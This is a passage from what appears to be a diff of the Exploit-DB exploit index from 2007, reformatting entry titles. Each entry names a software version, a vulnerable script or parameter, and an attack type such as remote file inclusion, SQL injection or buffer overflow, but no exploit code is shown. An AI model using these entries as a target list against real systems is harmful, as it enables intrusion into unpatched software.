pnFlashGames Module 1.5 - Remote SQL Injection",2007-04-28,"Mehmet Ince",php,webapps,0 3814,platforms/php/webapps/3814.txt,"WordPress Plugin mygallery <= 1.4b4 - Remote File Inclusion",2007-04-29,GoLd_M,php,webapps,0 3815,platforms/linux/remote/3815.c,"Fenice Oms server 1.10 - Remote Buffer Overflow Exploit (exec-shield)",2007-04-29,Xpl017Elz,linux,remote,0 -3816,platforms/php/webapps/3816.php,"TCExam <= 4.0.011 (SessionUserLang) Shell Injection Exploit",2007-04-29,rgod,php,webapps,0 -3817,platforms/php/webapps/3817.txt,"Imageview 5.3 (fileview.php album) Local File Inclusion",2007-04-29,DNX,php,webapps,0 -3818,platforms/php/webapps/3818.htm,"The Merchant <= 2.2.0 (index.php show) Remote File Inclusion Exploit",2007-04-29,kezzap66345,php,webapps,0 +3816,platforms/php/webapps/3816.php,"TCExam <= 4.0.011 - (SessionUserLang) Shell Injection Exploit",2007-04-29,rgod,php,webapps,0 +3817,platforms/php/webapps/3817.txt,"Imageview 5.3 - (fileview.php album) Local File Inclusion",2007-04-29,DNX,php,webapps,0 +3818,platforms/php/webapps/3818.htm,"The Merchant <= 2.2.0 - (index.php show) Remote File Inclusion Exploit",2007-04-29,kezzap66345,php,webapps,0 3819,platforms/windows/dos/3819.py,"RealPlayer 10 - (.ra) Remote Denial of Service Exploit",2007-04-30,n00b,windows,dos,0 -3820,platforms/php/webapps/3820.php,"psipuss 1.0 (editusers.php) Remote Change Admin Password Exploit",2007-04-30,Dj7xpl,php,webapps,0 +3820,platforms/php/webapps/3820.php,"psipuss 1.0 - (editusers.php) Remote Change Admin Password Exploit",2007-04-30,Dj7xpl,php,webapps,0 3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g - proxy.c logurl() Remote Buffer Overflow Exploit (linux)",2007-04-30,vade79,linux,remote,0 3822,platforms/windows/remote/3822.c,"3proxy 0.5.3g - proxy.c logurl() Remote Buffer Overflow Exploit (Win32)",2007-04-30,vade79,windows,remote,0 3823,platforms/windows/local/3823.c,"Winamp <= 5.34 - (.mp4) Code Execution Exploit",2007-04-30,Marsu,windows,local,0 3824,platforms/php/webapps/3824.txt,"WordPress Plugin wp-Table <= 1.43 - (inc_dir) RFI",2007-05-01,K-159,php,webapps,0 3825,platforms/php/webapps/3825.txt,"WordPress Plugin wordTube <= 1.43 - (wpPATH) RFI",2007-05-01,K-159,php,webapps,0 -3826,platforms/windows/dos/3826.html,"PowerPoint Viewer OCX 3.2 (ActiveX Control) Denial of Service Exploit",2007-05-01,shinnai,windows,dos,0 -3827,platforms/php/webapps/3827.txt,"Sendcard <= 3.4.1 (sendcard.php form) Local File Inclusion",2007-05-01,ettee,php,webapps,0 +3826,platforms/windows/dos/3826.html,"PowerPoint Viewer OCX 3.2 - (ActiveX Control) Denial of Service Exploit",2007-05-01,shinnai,windows,dos,0 +3827,platforms/php/webapps/3827.txt,"Sendcard <= 3.4.1 - (sendcard.php form) Local File Inclusion",2007-05-01,ettee,php,webapps,0 3828,platforms/php/webapps/3828.txt,"WordPress Plugin myflash <= 1.00 - (wppath) RFI",2007-05-01,Crackers_Child,php,webapps,0 3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g - proxy.c logurl() Remote Overflow Exploit (exec-shield)",2007-05-02,Xpl017Elz,linux,remote,0 3830,platforms/windows/dos/3830.html,"Excel Viewer OCX 3.1.0.6 - Multiple Methods Denial of Service Exploit",2007-05-02,shinnai,windows,dos,0 3831,platforms/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 - (download.asp File) File Disclosure",2007-05-02,Dj7xpl,asp,webapps,0 -3832,platforms/php/webapps/3832.txt,"1024 CMS 0.7 (download.php item) Remote File Disclosure",2007-05-02,Dj7xpl,php,webapps,0 +3832,platforms/php/webapps/3832.txt,"1024 CMS 0.7 - (download.php item) Remote File Disclosure",2007-05-02,Dj7xpl,php,webapps,0 3833,platforms/php/webapps/3833.pl,"mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion Exploit",2007-05-02,bd0rk,php,webapps,0 3834,platforms/php/webapps/3834.php,"YaPIG 0.95b Remote Code Execution Exploit",2007-05-02,Dj7xpl,php,webapps,0 3835,platforms/php/webapps/3835.txt,"PostNuke Module v4bJournal - Remote SQL Injection",2007-05-02,"Ali Abbasi",php,webapps,0 3836,platforms/windows/dos/3836.html,"Word Viewer OCX 3.2 - Remote Denial of Service Exploit",2007-05-03,shinnai,windows,dos,0 3837,platforms/php/webapps/3837.txt,"phpChess Community Edition 2.0 - Multiple RFI Vulnerabilities",2007-05-03,GoLd_M,php,webapps,0 3838,platforms/php/webapps/3838.txt,"Open Translation Engine (OTE) 0.7.8 - (header.php ote_home) RFI",2007-05-03,GoLd_M,php,webapps,0 -3839,platforms/php/webapps/3839.txt,"PHP Coupon Script 3.0 (index.php bus) Remote SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 +3839,platforms/php/webapps/3839.txt,"PHP Coupon Script 3.0 - (index.php bus) Remote SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3840,platforms/php/webapps/3840.txt,"Pre Classifieds Listings 1.0 - Remote SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3841,platforms/php/webapps/3841.txt,"Pre News Manager 1.0 - Remote SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3842,platforms/php/webapps/3842.txt,"Pre Shopping Mall 1.0 - Remote SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3843,platforms/php/webapps/3843.txt,"Censura 1.15.04 - (censura.php vendorid) SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3844,platforms/windows/remote/3844.html,"ActSoft DVD-Tools - (dvdtools.ocx 3.8.5.0) Stack Overflow Exploit",2007-05-04,shinnai,windows,remote,0 3845,platforms/windows/dos/3845.html,"Office Viewer OCX 3.2.0.5 - Multiple Methods Denial of Service Exploit",2007-05-04,shinnai,windows,dos,0 -3846,platforms/php/webapps/3846.txt,"E-GADS! 2.2.6 (common.php locale) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 +3846,platforms/php/webapps/3846.txt,"E-GADS! 2.2.6 - (common.php locale) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 3847,platforms/php/webapps/3847.txt,"Versado CMS 1.07 - (ajax_listado.php urlModulo) RFI",2007-05-04,kezzap66345,php,webapps,0 -3848,platforms/php/webapps/3848.txt,"workbench 0.11 (header.php path) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 +3848,platforms/php/webapps/3848.txt,"workbench 0.11 - (header.php path) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 3849,platforms/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - Remote SQL Injection",2007-05-04,"Mehmet Ince",php,webapps,0 -3850,platforms/php/webapps/3850.php,"RunCMS <= 1.5.2 (debug_show.php) Remote SQL Injection Exploit",2007-05-04,rgod,php,webapps,0 +3850,platforms/php/webapps/3850.php,"RunCMS <= 1.5.2 - (debug_show.php) Remote SQL Injection Exploit",2007-05-04,rgod,php,webapps,0 3851,platforms/multiple/dos/3851.c,"Multiple vendors ZOO file decompression Infinite Loop DoS PoC",2007-05-04,Jean-Sébastien,multiple,dos,0 3852,platforms/php/webapps/3852.txt,"PMECMS <= 1.0 - config[pathMod] Remote File Inclusion Vulnerabilities",2007-05-04,GoLd_M,php,webapps,0 3853,platforms/php/webapps/3853.txt,"Persism CMS <= 0.9.2 - system[path] Remote File Inclusion Vulnerabilities",2007-05-04,GoLd_M,php,webapps,0 @@ -3515,34 +3515,34 @@ id,file,description,date,author,platform,type,port 3857,platforms/php/webapps/3857.txt,"vm watermark for gallery 0.4.1 - Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 3858,platforms/php/webapps/3858.php,"Nuked-klaN 1.7.6 - Remote Code Execution Exploit",2007-05-05,DarkFig,php,webapps,0 3859,platforms/php/webapps/3859.txt,"Archangel Weblog 0.90.02 - Local File Inclusion / Admin Bypass Vulnerabilities",2007-05-05,Dj7xpl,php,webapps,0 -3860,platforms/php/webapps/3860.txt,"PHPtree 1.3 (cms2.php s_dir) Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 -3861,platforms/php/webapps/3861.txt,"NoAh <= 0.9 pre 1.2 (mfa_theme.php) Remote File Inclusion",2007-05-06,kezzap66345,php,webapps,0 +3860,platforms/php/webapps/3860.txt,"PHPtree 1.3 - (cms2.php s_dir) Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 +3861,platforms/php/webapps/3861.txt,"NoAh <= 0.9 pre 1.2 - (mfa_theme.php) Remote File Inclusion",2007-05-06,kezzap66345,php,webapps,0 3862,platforms/php/webapps/3862.txt,"XOOPS Module wfquotes 1.0 - Remote SQL Injection",2007-05-06,"Mehmet Ince",php,webapps,0 -3863,platforms/php/webapps/3863.txt,"Wikivi5 (show.php sous_rep) Remote File Inclusion",2007-05-06,GoLd_M,php,webapps,0 -3864,platforms/php/webapps/3864.txt,"Friendly <= 1.0d1 (friendly_path) Remote File Inclusion Vulnerabilities",2007-05-06,GoLd_M,php,webapps,0 +3863,platforms/php/webapps/3863.txt,"Wikivi5 - (show.php sous_rep) Remote File Inclusion",2007-05-06,GoLd_M,php,webapps,0 +3864,platforms/php/webapps/3864.txt,"Friendly <= 1.0d1 - (friendly_path) Remote File Inclusion Vulnerabilities",2007-05-06,GoLd_M,php,webapps,0 3865,platforms/php/webapps/3865.txt,"Tropicalm Crowell Resource 4.5.2 - (RESPATH) RFI Vulnerabilities",2007-05-07,kezzap66345,php,webapps,0 -3866,platforms/windows/dos/3866.html,"Versalsoft HTTP File Upload ActiveX 6.36 (AddFile) Remote DoS Exploit",2007-05-07,shinnai,windows,dos,0 -3867,platforms/php/webapps/3867.pl,"ACGVAnnu <= 1.3 (acgv.php rubrik) Local File Inclusion",2007-05-07,BeyazKurt,php,webapps,0 -3868,platforms/php/webapps/3868.txt,"DynamicPAD <= 1.02.18 (HomeDir) Remote File Inclusion Vulnerabilities",2007-05-07,"ThE TiGeR",php,webapps,0 -3869,platforms/php/webapps/3869.txt,"Berylium2 2003-08-18 (beryliumroot) Remote File Inclusion",2007-05-07,"ThE TiGeR",php,webapps,0 +3866,platforms/windows/dos/3866.html,"Versalsoft HTTP File Upload ActiveX 6.36 - (AddFile) Remote DoS Exploit",2007-05-07,shinnai,windows,dos,0 +3867,platforms/php/webapps/3867.pl,"ACGVAnnu <= 1.3 - (acgv.php rubrik) Local File Inclusion",2007-05-07,BeyazKurt,php,webapps,0 +3868,platforms/php/webapps/3868.txt,"DynamicPAD <= 1.02.18 - (HomeDir) Remote File Inclusion Vulnerabilities",2007-05-07,"ThE TiGeR",php,webapps,0 +3869,platforms/php/webapps/3869.txt,"Berylium2 2003-08-18 - (beryliumroot) Remote File Inclusion",2007-05-07,"ThE TiGeR",php,webapps,0 3870,platforms/php/webapps/3870.txt,"LaVague <= 0.3 - (printbar.php views_path) RFI",2007-05-08,kezzap66345,php,webapps,0 3871,platforms/multiple/dos/3871.html,"Opera 9.10 alert() Remote Denial of Service Exploit",2007-05-08,Dj7xpl,multiple,dos,0 3872,platforms/windows/remote/3872.html,"Taltech Tal Bar Code ActiveX Control Buffer Overflow Exploit",2007-05-08,"Umesh Wanve",windows,remote,0 -3873,platforms/windows/dos/3873.html,"SmartCode VNC Manager 3.6 (scvncctrl.dll) Denial of Service Exploit",2007-05-08,shinnai,windows,dos,0 -3874,platforms/php/webapps/3874.txt,"CGX 20050314 (pathCGX) Remote File Inclusion Vulnerabilities",2007-05-08,GoLd_M,php,webapps,0 -3875,platforms/php/webapps/3875.txt,"PHPLojaFacil 0.1.5 (path_local) Remote File Inclusion Vulnerabilities",2007-05-08,GoLd_M,php,webapps,0 +3873,platforms/windows/dos/3873.html,"SmartCode VNC Manager 3.6 - (scvncctrl.dll) Denial of Service Exploit",2007-05-08,shinnai,windows,dos,0 +3874,platforms/php/webapps/3874.txt,"CGX 20050314 - (pathCGX) Remote File Inclusion Vulnerabilities",2007-05-08,GoLd_M,php,webapps,0 +3875,platforms/php/webapps/3875.txt,"PHPLojaFacil 0.1.5 - (path_local) Remote File Inclusion Vulnerabilities",2007-05-08,GoLd_M,php,webapps,0 3876,platforms/php/webapps/3876.txt,"GNUEDU 1.3b2 - Multiple Remote File Inclusion Vulnerabilities",2007-05-08,GoLd_M,php,webapps,0 3877,platforms/windows/remote/3877.html,"IncrediMail IMMenuShellExt ActiveX Control Buffer Overflow Exploit",2007-05-08,"Umesh Wanve",windows,remote,0 -3878,platforms/php/webapps/3878.txt,"Miplex2 (SmartyFU.class.php) Remote File Inclusion",2007-05-08,"ThE TiGeR",php,webapps,0 +3878,platforms/php/webapps/3878.txt,"Miplex2 - (SmartyFU.class.php) Remote File Inclusion",2007-05-08,"ThE TiGeR",php,webapps,0 3879,platforms/php/webapps/3879.htm,"phpMyPortal 3.0.0 RC3 - GLOBALS[CHEMINMODULES] RFI Exploit",2007-05-09,GoLd_M,php,webapps,0 3880,platforms/windows/remote/3880.html,"Sienzo Digital Music Mentor 2.6.0.4 SetEvalExpiryDate SEH Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0 3881,platforms/windows/remote/3881.html,"Sienzo Digital Music Mentor 2.6.0.4 SetEvalExpiryDate EIP Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0 -3882,platforms/windows/remote/3882.html,"BarCodeWiz ActiveX Control 2.52 (BarcodeWiz.dll) SEH Overwrite Exploit",2007-05-09,"Parveen Vashishtha",windows,remote,0 -3883,platforms/windows/dos/3883.html,"BarCodeWiz ActiveX Control 2.0 (BarcodeWiz.dll) Remote BoF PoC",2007-05-09,shinnai,windows,dos,0 -3884,platforms/php/webapps/3884.txt,"aForum <= 1.32 (CommonAbsDir) Remote File Inclusion",2007-05-09,"ThE TiGeR",php,webapps,0 -3885,platforms/php/webapps/3885.txt,"telltarget <= 1.3.3 (tt_docroot) Remote File Inclusion Vulnerabilities",2007-05-09,GoLd_M,php,webapps,0 +3882,platforms/windows/remote/3882.html,"BarCodeWiz ActiveX Control 2.52 - (BarcodeWiz.dll) SEH Overwrite Exploit",2007-05-09,"Parveen Vashishtha",windows,remote,0 +3883,platforms/windows/dos/3883.html,"BarCodeWiz ActiveX Control 2.0 - (BarcodeWiz.dll) Remote BoF PoC",2007-05-09,shinnai,windows,dos,0 +3884,platforms/php/webapps/3884.txt,"aForum <= 1.32 - (CommonAbsDir) Remote File Inclusion",2007-05-09,"ThE TiGeR",php,webapps,0 +3885,platforms/php/webapps/3885.txt,"telltarget <= 1.3.3 - (tt_docroot) Remote File Inclusion Vulnerabilities",2007-05-09,GoLd_M,php,webapps,0 3886,platforms/php/webapps/3886.pl,"SimpleNews <= 1.0.0 FINAL (print.php news_id) SQL Injection Exploit",2007-05-09,Silentz,php,webapps,0 -3887,platforms/php/webapps/3887.pl,"TutorialCMS <= 1.00 (search.php search) SQL Injection Exploit",2007-05-09,Silentz,php,webapps,0 +3887,platforms/php/webapps/3887.pl,"TutorialCMS <= 1.00 - (search.php search) SQL Injection Exploit",2007-05-09,Silentz,php,webapps,0 3888,platforms/windows/local/3888.c,"Gimp 2.2.14 - (.ras) Download/Execute Buffer Overflow Exploit (Win32)",2007-05-09,"Kristian Hermansen",windows,local,0 3890,platforms/windows/dos/3890.html,"McAfee VirusScan 10.0.21 - ActiveX control Stack Overflow PoC",2007-05-09,callAX,windows,dos,0 3891,platforms/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 RControl.dll Denial of Service Exploit",2007-05-10,shinnai,windows,dos,0 @@ -3555,23 +3555,23 @@ id,file,description,date,author,platform,type,port 3898,platforms/windows/dos/3898.html,"Hewlett Packard 1.0.0.309 hpqvwocx.dll ActiveX Magview Overflow PoC",2007-05-11,callAX,windows,dos,0 3899,platforms/windows/remote/3899.html,"Morovia Barcode ActiveX Professional 3.3.1304 - Arbitrary File Overwrite",2007-05-11,shinnai,windows,remote,0 3900,platforms/php/webapps/3900.php,"Snaps! Gallery 1.4.4 - Remote User Pass Change Exploit",2007-05-11,Dj7xpl,php,webapps,0 -3901,platforms/php/webapps/3901.txt,"maGAZIn 2.0 (phpThumb.php src) Remote File Disclosure",2007-05-11,Dj7xpl,php,webapps,0 -3902,platforms/php/webapps/3902.txt,"R2K Gallery 1.7 (galeria.php lang2) Local File Inclusion",2007-05-11,Dj7xpl,php,webapps,0 +3901,platforms/php/webapps/3901.txt,"maGAZIn 2.0 - (phpThumb.php src) Remote File Disclosure",2007-05-11,Dj7xpl,php,webapps,0 +3902,platforms/php/webapps/3902.txt,"R2K Gallery 1.7 - (galeria.php lang2) Local File Inclusion",2007-05-11,Dj7xpl,php,webapps,0 3903,platforms/php/webapps/3903.php,"Monalbum 0.8.7 - Remote Code Execution Exploit",2007-05-11,Dj7xpl,php,webapps,0 3905,platforms/asp/webapps/3905.txt,"W1L3D4 Philboard 0.2 - (W1L3D4_bolum.asp forumid) SQL Injection",2007-05-11,gsy,asp,webapps,0 3906,platforms/php/webapps/3906.htm,"PHP FirstPost 0.1 - (block.php Include) Remote File Inclusion Exploit",2007-05-12,Dj7xpl,php,webapps,0 -3907,platforms/php/webapps/3907.txt,"iG Shop 1.4 (page.php) Remote SQL Injection",2007-05-12,gsy,php,webapps,0 +3907,platforms/php/webapps/3907.txt,"iG Shop 1.4 - (page.php) Remote SQL Injection",2007-05-12,gsy,php,webapps,0 3908,platforms/php/webapps/3908.txt,"YAAP <= 1.5 __autoload() Remote File Inclusion",2007-05-12,3l3ctric-Cracker,php,webapps,0 -3909,platforms/php/webapps/3909.txt,"Beacon 0.2.0 (splash.lang.php) Remote File Inclusion",2007-05-12,"ThE TiGeR",php,webapps,0 +3909,platforms/php/webapps/3909.txt,"Beacon 0.2.0 - (splash.lang.php) Remote File Inclusion",2007-05-12,"ThE TiGeR",php,webapps,0 3910,platforms/windows/dos/3910.html,"PrecisionID Barcode ActiveX 1.3 - Denial of Service Exploit",2007-05-12,shinnai,windows,dos,0 -3911,platforms/php/webapps/3911.txt,"EfesTECH Haber 5.0 (id) Remote SQL Injection",2007-05-14,CyberGhost,php,webapps,0 +3911,platforms/php/webapps/3911.txt,"EfesTECH Haber 5.0 - (id) Remote SQL Injection",2007-05-14,CyberGhost,php,webapps,0 3912,platforms/windows/local/3912.c,"notepad++ 4.1 ruby file processing Buffer Overflow Exploit (Win32)",2007-05-12,vade79,windows,local,0 3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 - (GET Request) Remote Buffer Overflow Exploit",2007-05-12,vade79,windows,remote,8080 -3914,platforms/asp/webapps/3914.txt,"BlogMe 3.0 (archshow.asp var) Remote SQL Injection",2007-05-13,gsy,asp,webapps,0 +3914,platforms/asp/webapps/3914.txt,"BlogMe 3.0 - (archshow.asp var) Remote SQL Injection",2007-05-13,gsy,asp,webapps,0 3915,platforms/php/webapps/3915.txt,"CJG EXPLORER PRO 3.2 - (g_pcltar_lib_dir) RFI Vulnerabilities",2007-05-13,Mogatil,php,webapps,0 3916,platforms/windows/remote/3916.php,"VImpX ActiveX (VImpX.ocx 4.7.3.0) - Remote Buffer Overflow Exploit",2007-05-13,rgod,windows,remote,0 3917,platforms/windows/dos/3917.html,"ID Automation Linear Barcode ActiveX Denial of Service Exploit",2007-05-13,shinnai,windows,dos,0 -3918,platforms/php/webapps/3918.txt,"phpAtm 1.30 (downloadfile) Remote File Disclosure",2007-05-13,Ali.Mohajem,php,webapps,0 +3918,platforms/php/webapps/3918.txt,"phpAtm 1.30 - (downloadfile) Remote File Disclosure",2007-05-13,Ali.Mohajem,php,webapps,0 3919,platforms/php/webapps/3919.txt,"NagiosQL 2005 2.00 - (prepend_adm.php) Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 3920,platforms/php/webapps/3920.txt,"Feindt Computerservice News 2.0 - (newsadmin.php action) RFI",2007-05-14,Mogatil,php,webapps,0 3921,platforms/windows/dos/3921.html,"Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow PoC",2007-05-14,shinnai,windows,dos,0 @@ -3581,12 +3581,12 @@ id,file,description,date,author,platform,type,port 3925,platforms/windows/remote/3925.py,"TinyIdentD <= 2.2 - Remote Buffer Overflow Exploit",2007-05-14,"Thomas Pollet",windows,remote,113 3926,platforms/windows/dos/3926.py,"Microsoft Windows Vista - Forged ARP packet Network Stack DoS Exploit",2007-05-15,"Kristian Hermansen",windows,dos,0 3927,platforms/windows/remote/3927.html,"DeWizardX (DEWizardAX.ocx) Arbitrary File Overwrite Exploit",2007-05-15,shinnai,windows,remote,0 -3928,platforms/php/webapps/3928.txt,"Achievo 1.1.0 (atk.inc config_atkroot) Remote File Inclusion",2007-05-15,Katatafish,php,webapps,0 -3929,platforms/windows/dos/3929.txt,"BitsCast 0.13.0 (invalid string) Remote Denial of Service Exploit",2007-05-15,gbr,windows,dos,0 -3930,platforms/windows/dos/3930.txt,"NewzCrawler 1.8 (invalid string) Remote Denial of Service Exploit",2007-05-15,gbr,windows,dos,0 +3928,platforms/php/webapps/3928.txt,"Achievo 1.1.0 - (atk.inc config_atkroot) Remote File Inclusion",2007-05-15,Katatafish,php,webapps,0 +3929,platforms/windows/dos/3929.txt,"BitsCast 0.13.0 - (invalid string) Remote Denial of Service Exploit",2007-05-15,gbr,windows,dos,0 +3930,platforms/windows/dos/3930.txt,"NewzCrawler 1.8 - (invalid string) Remote Denial of Service Exploit",2007-05-15,gbr,windows,dos,0 3931,platforms/php/webapps/3931.htm,"XOOPS Module resmanager <= 1.21 - Blind SQL Injection Exploit",2007-05-15,ajann,php,webapps,0 -3932,platforms/php/webapps/3932.pl,"XOOPS Module Glossarie <= 1.7 (sid) Remote SQL Injection Exploit",2007-05-15,ajann,php,webapps,0 -3933,platforms/php/webapps/3933.pl,"XOOPS Module MyConference 1.0 (index.php) SQL Injection Exploit",2007-05-15,ajann,php,webapps,0 +3932,platforms/php/webapps/3932.pl,"XOOPS Module Glossarie <= 1.7 - (sid) Remote SQL Injection Exploit",2007-05-15,ajann,php,webapps,0 +3933,platforms/php/webapps/3933.pl,"XOOPS Module MyConference 1.0 - (index.php) SQL Injection Exploit",2007-05-15,ajann,php,webapps,0 3934,platforms/windows/remote/3934.py,"Eudora 7.1 SMTP ResponseRemote Remote Buffer Overflow Exploit",2007-05-15,h07,windows,remote,0 3935,platforms/php/webapps/3935.txt,"Glossword 1.8.1 custom_vars.php Remote File Inclusion",2007-05-16,BeyazKurt,php,webapps,0 3936,platforms/asp/webapps/3936.txt,"runawaysoft haber portal 1.0 - (tr) Multiple Vulnerabilities",2007-05-16,kerem125,asp,webapps,0 @@ -3594,73 +3594,73 @@ id,file,description,date,author,platform,type,port 3938,platforms/windows/remote/3938.html,"PrecisionID Barcode ActiveX 1.9 - Remote Arbitrary File Overwrite Exploit",2007-05-16,shinnai,windows,remote,0 3939,platforms/windows/dos/3939.py,"CA BrightStor Backup 11.5.2.0 caloggderd.exe Denial of Service Exploit",2007-05-16,Shirkdog,windows,dos,0 3940,platforms/windows/dos/3940.py,"CA BrightStor Backup 11.5.2.0 Mediasvr.exe Denial of Service Exploit",2007-05-16,Shirkdog,windows,dos,0 -3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 (format_menue) Remote File Inclusion Vulnerabilities",2007-05-16,kezzap66345,php,webapps,0 -3942,platforms/php/webapps/3942.pl,"SimpNews <= 2.40.01 (print.php newnr) Remote SQL Injection Exploit",2007-05-16,Silentz,php,webapps,0 -3943,platforms/php/webapps/3943.pl,"FAQEngine <= 4.16.03 (question.php questionref) SQL Injection Exploit",2007-05-16,Silentz,php,webapps,0 +3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 - (format_menue) Remote File Inclusion Vulnerabilities",2007-05-16,kezzap66345,php,webapps,0 +3942,platforms/php/webapps/3942.pl,"SimpNews <= 2.40.01 - (print.php newnr) Remote SQL Injection Exploit",2007-05-16,Silentz,php,webapps,0 +3943,platforms/php/webapps/3943.pl,"FAQEngine <= 4.16.03 - (question.php questionref) SQL Injection Exploit",2007-05-16,Silentz,php,webapps,0 3944,platforms/php/webapps/3944.txt,"Mambo com_yanc 1.4 beta (id) Remote SQL Injection",2007-05-17,"Mehmet Ince",php,webapps,0 3945,platforms/linux/dos/3945.rb,"MagicISO <= 5.4 (build239) - (.cue) Heap Overflow PoC",2007-05-17,n00b,linux,dos,0 3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - ImageImageMagick.php Remote File Inclusion",2007-05-17,diesl0w,php,webapps,0 3947,platforms/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusion Vulnerabilities",2007-05-17,"Alkomandoz Hacker",php,webapps,0 -3948,platforms/php/webapps/3948.txt,"Libstats <= 1.0.3 (template_csv.php) Remote File Inclusion",2007-05-18,"Mehmet Ince",php,webapps,0 -3949,platforms/php/webapps/3949.txt,"MolyX BOARD 2.5.0 (index.php lang) Local File Inclusion",2007-05-18,MurderSkillz,php,webapps,0 +3948,platforms/php/webapps/3948.txt,"Libstats <= 1.0.3 - (template_csv.php) Remote File Inclusion",2007-05-18,"Mehmet Ince",php,webapps,0 +3949,platforms/php/webapps/3949.txt,"MolyX BOARD 2.5.0 - (index.php lang) Local File Inclusion",2007-05-18,MurderSkillz,php,webapps,0 3950,platforms/windows/remote/3950.html,"LeadTools JPEG 2000 COM Object Remote Stack Overflow Exploit",2007-05-18,shinnai,windows,remote,0 3951,platforms/windows/remote/3951.html,"LeadTools Thumbnail Browser Control (lttmb14E.ocx) Remote BoF Exploit",2007-05-18,shinnai,windows,remote,0 3952,platforms/windows/remote/3952.html,"LeadTools Raster Thumbnail Object Library (LTRTM14e.DLL) BoF Exploit",2007-05-18,shinnai,windows,remote,0 -3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 (root) Remote File Inclusion Vulnerabilities",2007-05-19,"Mehmet Ince",php,webapps,0 +3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 - (root) Remote File Inclusion Vulnerabilities",2007-05-19,"Mehmet Ince",php,webapps,0 3954,platforms/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 - Auth Bypass Exploit",2007-05-19,"Ahmed Siddiqui",windows,remote,69 -3955,platforms/php/webapps/3955.py,"Zomplog <= 3.8 (mp3playlist.php speler) Remote SQL Injection Exploit",2007-05-20,NeoMorphS,php,webapps,0 +3955,platforms/php/webapps/3955.py,"Zomplog <= 3.8 - (mp3playlist.php speler) Remote SQL Injection Exploit",2007-05-20,NeoMorphS,php,webapps,0 3956,platforms/php/webapps/3956.php,"AlstraSoft E-Friends <= 4.21 Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 3957,platforms/php/webapps/3957.php,"AlstraSoft Live Support 1.21 - Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 3958,platforms/php/webapps/3958.php,"AlstraSoft Template Seller Pro <= 3.25 Admin Password Change Exploit",2007-05-20,BlackHawk,php,webapps,0 3959,platforms/php/webapps/3959.php,"AlstraSoft Template Seller Pro <= 3.25 - Remote Code Execution Exploit",2007-05-20,BlackHawk,php,webapps,0 3960,platforms/php/webapps/3960.php,"WordPress 2.1.3 - admin-ajax.php SQL Injection Blind Fishing Exploit",2007-05-21,waraxe,php,webapps,0 3961,platforms/windows/remote/3961.html,"LeadTools Raster Variant (LTRVR14e.dll) Remote File Overwrite Exploit",2007-05-21,shinnai,windows,remote,0 -3962,platforms/php/webapps/3962.txt,"Ol Bookmarks Manager 0.7.4 (root) Remote File Inclusion Vulnerabilities",2007-05-21,"ThE TiGeR",php,webapps,0 +3962,platforms/php/webapps/3962.txt,"Ol Bookmarks Manager 0.7.4 - (root) Remote File Inclusion Vulnerabilities",2007-05-21,"ThE TiGeR",php,webapps,0 3963,platforms/php/webapps/3963.txt,"TutorialCMS <= 1.01 - Authentication Bypass",2007-05-21,Silentz,php,webapps,0 3964,platforms/php/webapps/3964.txt,"Ol Bookmarks Manager 0.7.4 - Remote SQL Injection",2007-05-21,"Mehmet Ince",php,webapps,0 -3965,platforms/windows/dos/3965.pl,"Microsoft IIS 6.0 (/AUX/.aspx) Remote Denial of Service Exploit",2007-05-21,kingcope,windows,dos,0 +3965,platforms/windows/dos/3965.pl,"Microsoft IIS 6.0 - (/AUX/.aspx) Remote Denial of Service Exploit",2007-05-21,kingcope,windows,dos,0 3966,platforms/windows/remote/3966.php,"Pegasus ImagN ActiveX Control Remote Buffer Overflow Exploit",2007-05-21,rgod,windows,remote,0 -3967,platforms/windows/remote/3967.html,"Virtual CD 9.0.0.2 (vc9api.DLL) Remote Shell Commands Execution Exploit",2007-05-21,rgod,windows,remote,0 +3967,platforms/windows/remote/3967.html,"Virtual CD 9.0.0.2 - (vc9api.DLL) Remote Shell Commands Execution Exploit",2007-05-21,rgod,windows,remote,0 3968,platforms/windows/remote/3968.html,"KSign KSignSWAT <= 2.0.3.3 - ActiveX Control Remote BoF Exploit",2007-05-22,"KIM Kee-hong",windows,remote,0 3969,platforms/windows/dos/3969.html,"LeadTools ISIS Control - (ltisi14E.ocx v.14.5.0.44) Remote DoS Exploit",2007-05-22,shinnai,windows,dos,0 -3970,platforms/php/webapps/3970.txt,"BtiTracker <= 1.4.1 (become admin) Remote SQL Injection",2007-05-22,m@ge|ozz,php,webapps,0 +3970,platforms/php/webapps/3970.txt,"BtiTracker <= 1.4.1 - (become admin) Remote SQL Injection",2007-05-22,m@ge|ozz,php,webapps,0 3971,platforms/php/webapps/3971.php,"NavBoard 2.6.0 - Remote Code Execution Exploit",2007-05-23,Dj7xpl,php,webapps,0 3972,platforms/php/webapps/3972.txt,"Scallywag (template.php path) 